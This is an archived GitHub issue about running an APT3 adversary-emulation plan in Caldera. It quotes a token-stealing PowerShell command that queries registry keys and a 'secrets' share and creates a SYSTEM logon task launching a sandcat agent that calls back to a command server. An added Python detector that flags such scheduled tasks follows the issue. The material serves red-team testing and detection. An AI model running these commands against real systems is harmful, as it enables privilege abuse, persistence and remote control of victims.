This repository has been archived by the owner on Sep 14, 2023. It is now read-only.

[Plugin - Phase 16 ] 5.B.1 - Access Token Manipulation (T1134), 6.A.1 - Query Registry (T1012), 7.B.1 - Remote File Copy (T1105), 7.C.1 - Scheduled Tasks (T1053), 8.A.1/2 - File and Directory Discovery (T1083) #4

Closed
Cyb3rWard0g opened this issue Oct 16, 2019 · 1 comment

Comments

@Cyb3rWard0g

Good evening,

this issue goes along with:

because they are from the same setup and operation execution (APT3 - Full)

When I got to 5.B.1 - Access Token Manipulation (T1134), 6.A.1 - Query Registry (T1012), 7.B.1 - Remote File Copy (T1105), 7.C.1 - Scheduled Tasks (T1053), 8.A.1/2 - File and Directory Discovery (T1083) I got the following message:

```
Import-Module .\StealToken.ps1 -Verbose -Force;StealToken;CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\\\FILE001\secrets\hklm\system\currentcontrolset\control\terminal server"';CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe http://172.18.39.8:8888 evals" /sc ONLOGON /RU SYSTEM';CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b \\FILE001\secrets';CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%';RevertToSelf;
Payload(s) not available: sandcat.exe
```

I was a little confused with the "sandcat.exe" binary. It is in C:\users\public\sandcat.exe as shown below:

[image]

and this is because when I ran the PowerShell command, it downloaded it there:

[image]

However, I believe the script believes it is on the path where the session is running from? Maybe? However, as you can see below, I ran the PowerShell script from the user pgustavo's default path. I don't know if this makes sense? 😆

[image]

Does it make sense to update the script and set it to point to C:\users\public\sandcat.exe since it is the default location for when it is downloaded? Or can I just download the payload and run it from wherever I want? You guys have this in the Wiki: "Step 1 began with a legitimate user executing the payload on the victim host." I believe that maybe an additional comment can be added to the Wiki to be very specific on why you need to download it rather than using the other options available in Caldera for initial access? Maybe? Just sharing some thoughts and my initial test 👍. I am so happy the other steps worked perfectly fine and I was able to collect the data generated by each step 😉.

Thank you in advance!
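As an added, defender-side illustration (not part of the original issue or of the Caldera plugin), the check below runs over constructed Sysmon-style process-creation records and flags `schtasks /create` invocations like the one quoted above: a SYSTEM run-as, a relative payload path such as `.\sandcat.exe`, a payload under `C:\Users`, or an ONLOGON trigger. The pipe-delimited `Field: value` record layout, field names, user and directory values are assumptions made for the example.

```python
import re

# Constructed Sysmon-style process-creation records (assumed layout, not from the issue).
SAMPLE_LOGS = [
    r'Image: C:\Windows\System32\schtasks.exe|CommandLine: schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe http://172.18.39.8:8888 evals" /sc ONLOGON /RU SYSTEM|CurrentDirectory: C:\Users\pgustavo\|User: LAB\pgustavo',
    r'Image: C:\Windows\System32\schtasks.exe|CommandLine: schtasks /query /tn "Resume Viewer Update Checker"|CurrentDirectory: C:\Windows\system32\|User: LAB\pgustavo',
    r'Image: C:\Windows\System32\schtasks.exe|CommandLine: schtasks /create /tn "Resume Viewer Update Checker" /tr "C:\Users\Public\sandcat.exe http://172.18.39.8:8888 evals" /sc ONLOGON|CurrentDirectory: C:\Users\pgustavo\|User: LAB\pgustavo',
]

FIELD_RE = re.compile(r'(\w+): (.*?)(?=\|\w+: |$)')   # "Field: value" pairs split on "|"
TN_RE = re.compile(r'/tn\s+"([^"]*)"', re.IGNORECASE)  # task name
TR_RE = re.compile(r'/tr\s+"([^"]*)"', re.IGNORECASE)  # task action (program + arguments)
RU_RE = re.compile(r'/ru\s+(\S+)', re.IGNORECASE)      # run-as account

def parse_record(line):
    """Split a pipe-delimited 'Field: value' record into a dict."""
    return {m.group(1): m.group(2) for m in FIELD_RE.finditer(line)}

def is_relative(path):
    """True unless the path is drive-letter absolute or a UNC path."""
    return re.match(r'^([a-zA-Z]:\\|\\\\)', path) is None

def assess_schtasks(record):
    """Return {'task', 'target', 'reasons'} for a risky schtasks /create, else None.
    A relative /tr program is resolved when the task fires, under the task's own
    working directory, not the directory schtasks was typed in."""
    cmd = record.get('CommandLine', '')
    low = cmd.lower()
    if 'schtasks' not in low or '/create' not in low:
        return None
    tr = TR_RE.search(cmd)
    target = tr.group(1).split()[0] if tr else ''   # program is the first token of /tr
    reasons = []
    ru = RU_RE.search(cmd)
    if ru and ru.group(1).upper() == 'SYSTEM':
        reasons.append('runs as SYSTEM')
    if target and is_relative(target):
        reasons.append('relative payload path')
    if re.match(r'^[a-zA-Z]:\\users\\', target, re.IGNORECASE):
        reasons.append('payload in user-writable location')
    if '/sc onlogon' in low:
        reasons.append('logon-triggered persistence')
    if not reasons:
        return None
    tn = TN_RE.search(cmd)
    return {'task': tn.group(1) if tn else '', 'target': target, 'reasons': reasons}

def scan(lines):
    """Parse raw records and return only those assess_schtasks flags."""
    return [hit for hit in (assess_schtasks(parse_record(l)) for l in lines) if hit]
```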

@jondricek
Contributor

Admin note: closing all remaining issues and pull requests prior to archiving the repository
